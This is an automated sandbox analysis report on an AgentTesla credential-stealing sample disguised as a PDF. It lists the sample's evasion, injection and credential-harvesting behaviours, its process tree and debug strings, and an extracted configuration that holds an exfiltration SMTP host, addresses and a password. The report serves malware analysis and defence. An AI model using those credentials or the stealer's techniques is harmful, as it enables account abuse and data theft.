Loading ...

Play interactive tourEdit tour

Analysis Report 0603321WG_0_1 pdf.exe

Overview

General Information

Sample Name:0603321WG_0_1 pdf.exe
Analysis ID:356527
MD5:9844048a2b7081d223139f100b0ff486
SHA1:1cb465daf8e6a202356db86a9380e94e6cc1fa4d
SHA256:283915d333318f5e8e7f30cdf8f8f96723da7af6ddab9c29c6f0b5a687157aa4
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • 0603321WG_0_1 pdf.exe (PID: 7004 cmdline: 'C:\Users\user\Desktop\0603321WG_0_1 pdf.exe' MD5: 9844048A2B7081D223139F100B0FF486)
    • cmd.exe (PID: 4804 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4112 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • 0603321WG_0_1 pdf.exe (PID: 4500 cmdline: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe MD5: 9844048A2B7081D223139F100B0FF486)
    • WerFault.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 4972 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 9844048A2B7081D223139F100B0FF486)
    • cmd.exe (PID: 7148 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5672 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 6000 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 9844048A2B7081D223139F100B0FF486)
    • WerFault.exe (PID: 4660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1896 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 7056 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 9844048A2B7081D223139F100B0FF486)
    • cmd.exe (PID: 6240 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1692 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 5552 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 9844048A2B7081D223139F100B0FF486)
    • WerFault.exe (PID: 4780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1464 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "lD7CEXwZN", "URL: ": "http://IScLhfPkYRYa5.com", "To: ": "greatzills@gmail.com", "ByHost: ": "mail.orienttech.com.qa:587", "Password: ": "Y3O4R6toekwlmQ", "From: ": "sales@orienttech.com.qa"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.0603321WG_0_1 pdf.exe.47a2af0.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              19.2.NewApp.exe.650ce20.11.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                7.2.0603321WG_0_1 pdf.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.0603321WG_0_1 pdf.exe.47d8910.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    19.2.NewApp.exe.6979bd8.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 10 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0603321WG_0_1 pdf.exe.4500.7.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "lD7CEXwZN", "URL: ": "http://IScLhfPkYRYa5.com", "To: ": "greatzills@gmail.com", "ByHost: ": "mail.orienttech.com.qa:587", "Password: ": "Y3O4R6toekwlmQ", "From: ": "sales@orienttech.com.qa"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeReversingLabs: Detection: 21%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 0603321WG_0_1 pdf.exeReversingLabs: Detection: 21%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: 0603321WG_0_1 pdf.exeJoe Sandbox ML: detected
                      Source: 7.2.0603321WG_0_1 pdf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 28.2.NewApp.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 27.2.NewApp.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                      Source: 0603321WG_0_1 pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdbse$je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbOe@j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbYX&n source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbF source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdbUe:jC source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB13 source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb4 source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb< source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbL source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbN source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: psapi.pdb#N source: WerFault.exe, 0000001F.00000003.829483729.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: iertutil.pdbP source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb] source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbK source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb^ source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdbd source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdbIeNj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb. source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdbCeTj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbae6je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbv source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb>Y source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001F.00000003.806462338.0000000000A21000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb0,J source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdbye source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13Z source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: J0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdbV#jN source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdbm source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbme"j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: }C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB?p source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: .pdb, source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: rsaenh.pdbk source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb&& source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdbu source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
